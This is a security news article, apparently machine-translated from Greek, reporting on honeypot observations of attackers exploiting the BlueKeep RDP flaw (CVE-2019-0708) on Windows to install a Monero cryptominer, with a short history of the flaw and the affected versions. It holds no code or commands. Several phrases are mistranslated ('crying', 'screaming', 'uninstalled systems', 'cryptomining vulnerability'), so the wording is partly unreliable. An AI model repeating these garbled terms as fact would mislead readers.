Tuesday, October 27, 17:54
Home security Exploiting BlueKeep cryptomining vulnerability in Windows systems

Exploiting BlueKeep cryptomining vulnerability in Windows systems

BlueKeepThe RDP vulnerability BlueKeep on Windows Remote Desktop Services is currently being used by hackers for cryptomining aims. The attackers are exploiting vulnerabilities systems to steal cryptocurrencies.

Attacks were observed through honeypots. The security investigator, who discovered the attempts, is Kevin Beaumont. THE researcher noticed that many honeypots on his EternalPot RDP honeypot network began to "crashAnd restart. The honeypots have been active for about half a year. Saturday was the first time a malfunction was observed. However, Beaumont noted that machinery in Australia did not "fail".

X X X X X X X X X X X X X X X X MalwareTech (web name) examined the issues cited by Beaumont and concluded that the "crying" was due to BlueKeep vulnerability. MalwareTech said the attackers used the BlueKeep vulnerability to install one Monero Miner.

The first analysis of MalwareTech showed that an initial payload executes a coded PowerShell command, which downloads a second coded PowerShell script. The final payload is a cryptominer (probably for Monero).

According to the researcher, the malicious software is not a worm, but it exploits en masse the BlueKeep vulnerability. So the researcher realized that the attackers were using more than one BlueKeep scanner, which helps them to detect them vulnerable systems, to install the cryptominer.

The researcher also said that server used to exploit the vulnerability gets the target IP addresses from a predefined list.

A combination of cryptominer and BlueKeep scanner had also been reported in July. The malicious software, which combined these two features, was named Watchbog and it was mainly targeted Linux servers.

Intezer had studied malware then and found that scanner integration "indicates that WatchBog is preparing a list of vulnerable systems that hackers will target in the future or sell to others."

However, according to MalwareTech, the current attacks are not related to Watchbog malware.

BlueKeep: Brief history of vulnerability

The vulnerability BlueKeep (CVE-2019-0708) made its appearance many months ago. The experts security they rated it as critical, as it allows malware to spread to vulnerable systems without user intervention. Many governments and security companies have begun to warn of the criticality of vulnerability, and so Microsoft released a patch on 14 in May.

Typically, exploiting this RDP vulnerability results in a "screaming" of the target system. The researchers, who created a working exploit, tried to keep the details secret, so that hackers could not immediately create their own version and exploit uninstalled systems.

What versions of Are Windows Affected?

Fortunately, BlueKeep vulnerability does not affect all versions of Windows. According to Microsoft, hackers can influence them Windows 7, Windows Server 2008 R2 and Windows Server 2008 and install cryptominer.


Please enter your comment!
Please enter your name here

Absent Mia
Absent Miahttps://www.secnews.gr
Being your self, in a world that constantly tries to change you, is your greatest achievement


How to install a .watchface file on Apple Watch

The Apple Watch lets you customize the faces of the watch to display all kinds of useful information. But did you know ...

The five biggest data breaches of the 21st century

Data is becoming more and more sought after as our daily lives become more digitized. The technology giants that monopolize data are ...

Microsoft is limiting the availability of Windows 10 20H2

Microsoft is currently restricting the availability of Windows 10 20H2 to provide all users who want to ...

How to enable the new Chrome Read more feature

The latest version of Google Chrome browser, v86, released earlier this month, contains a secret feature called Read ...

How to choose a custom color for the Start menu

Starting with the October 2020 update, Windows 10 is the default on a theme that removes bright colors from ...

NASA telescope discovers drinking water on the moon

Eleven years ago, a spacecraft changed our view of the moon forever. The data collected by ...

Microsoft: Enhances password spray attack detection capabilities

Microsoft has significantly improved the ability to detect password spray attacks in the Azure Active Directory (Azure AD) and has reached the point ...

How to prevent companies from finding our phone number

In the age of advertising, the more user information is known the more convenient it is for companies. And in particular, the ...

Violation in a psychotherapy clinic led to blackmail of patients

Two years ago, a cyber attack took place in a Finnish psychotherapy clinic, which resulted in data theft and ransom demand. Now,...

Australia: Enhances cybersecurity and privacy!

The Government of New South Wales in Australia has set up a task force to strengthen cybersecurity and protection ...